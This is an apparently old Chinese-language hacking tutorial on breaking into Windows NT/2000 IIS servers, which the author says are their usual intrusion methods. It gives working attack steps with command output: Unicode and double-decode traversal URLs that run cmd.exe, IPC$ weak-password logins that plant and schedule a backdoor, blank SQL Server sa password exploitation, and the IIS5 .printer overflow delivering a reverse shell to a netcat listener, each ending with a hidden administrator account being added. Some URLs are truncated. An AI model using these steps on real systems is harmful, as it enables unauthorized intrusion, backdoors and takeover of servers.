一．编码漏洞入侵
1.unicode入侵
原理:由于IIS在解释unicode编码时把%c1%1c等编码解释成 ／ 造成浏览器突破最底层权限，访问到硬盘内容。
操作手段如下：
http://127.0.0.1/scripts/..%c1%1c.....em32/cmd.exe?/c dir
以上操作就能访问到主机的c盘了。（权限为IUSER_machinename）

2.IIS CGI文件名错误解码漏洞
原理：IIS在加载可执行CGI程序时，会进行两次解码。第一次解码是对CGI文件名进行http解码，然后判断此文件名是否为可执行文件，例如检查后缀名是否为".exe"或".com"等等。在文件名检查通过之后，IIS会再进行第二次解码。正常情况下，应该只对该CGI的参数进行解码，然而，IIS错误地将已经解码过的CGI文件名和CGI参数一起进行解码。这样，CGI文件名就被错误地解码了两次。
例如：IIS会把..%255c解释为../
操作手段如下：
http://127.0.0.1/scripts/..%255c..%...em32/cmd.exe?/c dir
以上操作就能访问到主机的c盘了。（权限为IUSER_machinename）

二．弱口令或口令为空入侵

1.IPC弱口令入侵
原理：由于某些网络管理员安全意识差，设置的管理员密码过于简单或者管理员密码为空，建立IPC连接进行简单的口令测试后得到管理员权限。
操作手段如下:
c:\>net use \\127.0.0.1\ipc$ "password" /user:"username"
c:\>copy srv.exe \\127.0.0.1\admin$\system32\srv.exe
c:\>net time
c:\>at \\127.0.0.1 time srv.exe
c:\>telnet 127.0.0.1 99
login 127.0.0.1
c:\>net user newboys 12345 /add
The command completed successfully.
c:\>net localgroup administrators newboys /add
The command completed successfully.
如上操作基于对方主机开了IPC共享，并且有admin权限的用户的username以及password。对方还要开设了Schedule服务（就是可以使用at命令）。

2.SQL SERVER默认管理员（sa）口令为空入侵
原理：由于MS的SQL SERVER的默认管理员（sa）口令为空，并且sa的权限为system。
操作手段如下：
打开流光，按CTRL+R键出现了主机扫描设置对话框。打入开始地址，以及结束地址。选择主机类型为SQL，按确定。流光会自动扫描选定网段的主机1433端口是否开着。如开着，会自动探测sa的默认密码是否为空。（注：1433端口这SQL默认端口）如果流光发现sa有弱口令或口令为空，这时你可以使用流光自带的SQL的远程命令工具就行了。（快捷键为CTRL+Q）
SQLCMD>net user newboys 12345 /add
The command completed successfully.
SQLCMD>net localgroup administrators newboys /add
The command completed successfully.
如上操作中的流光可以在www.netxeyes.net或www.netxeyes.org?..wboys推荐使用。

三.溢出入侵

1.IIS溢出入侵
原理：默认情况下，IIS 5.0服务器存在一个后缀为"printer"的应用程序映射，这个映射使用位于\WINNT\System32\下的名为 msw3prt.dll 的动态库文件。这个功能是用于基于Web控制的网络打印的，是Windows2000为Internet Printing Protocol(IPP)协议而设置的应用程序功能。不幸的是，这个映射存在一个缓冲区溢出错误，可以导致
inetinfo.exe出错，允许黑客通过web获取服务器的管理权限，黑客制造一个 .printer 的ISAPI请求，当Http host参数的值达到420个字符时，就会发生缓冲区溢出：
GET /NULL.printer HTTP/1.0
Host: [buffer]
当上述 [buffer]值的字符数目达到420时，缓冲区溢出。
操作手段如下：
1、首先在本机用NC开一个监听端口。
C:\>nc -l -p 99
2、运行IIS5Exploit
D:\> IIS5Exploit xxx.xxx.xxx.xxx 211.152.188.1 99
===========IIS5 English Version .Printer Exploit.===========
===Written by Assassin 1995-2001.http://www.netXeyes.com===
Connecting 211.152.188.1 ...OK.
Send Shell Code ...OK
IIS5 Shell Code Send OK
其中211.152.188.1指向本地IP。
稍等片刻，如果成功在本机NC舰艇的端口出现：
C:\>nc -l -p 99
Microsoft Windows 2000[Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\>
可以执行命令。如：
C:\>net user newboys 12345 /add
The command completed successfully.
C:\>net localgroup administrartors newboys /add
The command completed successfully.
这样就创建了一个属于Administrator组的用户newboys,密码为12345.
以上使用的程序为IIS5 .Printer Exploit同样可以去www.netxeyes.net或www.netxeyes.org下载。

这些都是我在入侵NT服务器是常用到的手段，当然还要靠你的大脑分析，把你所掌握的综合起来：）感谢xhacker对我的批评教育与指导，阿九谢过：）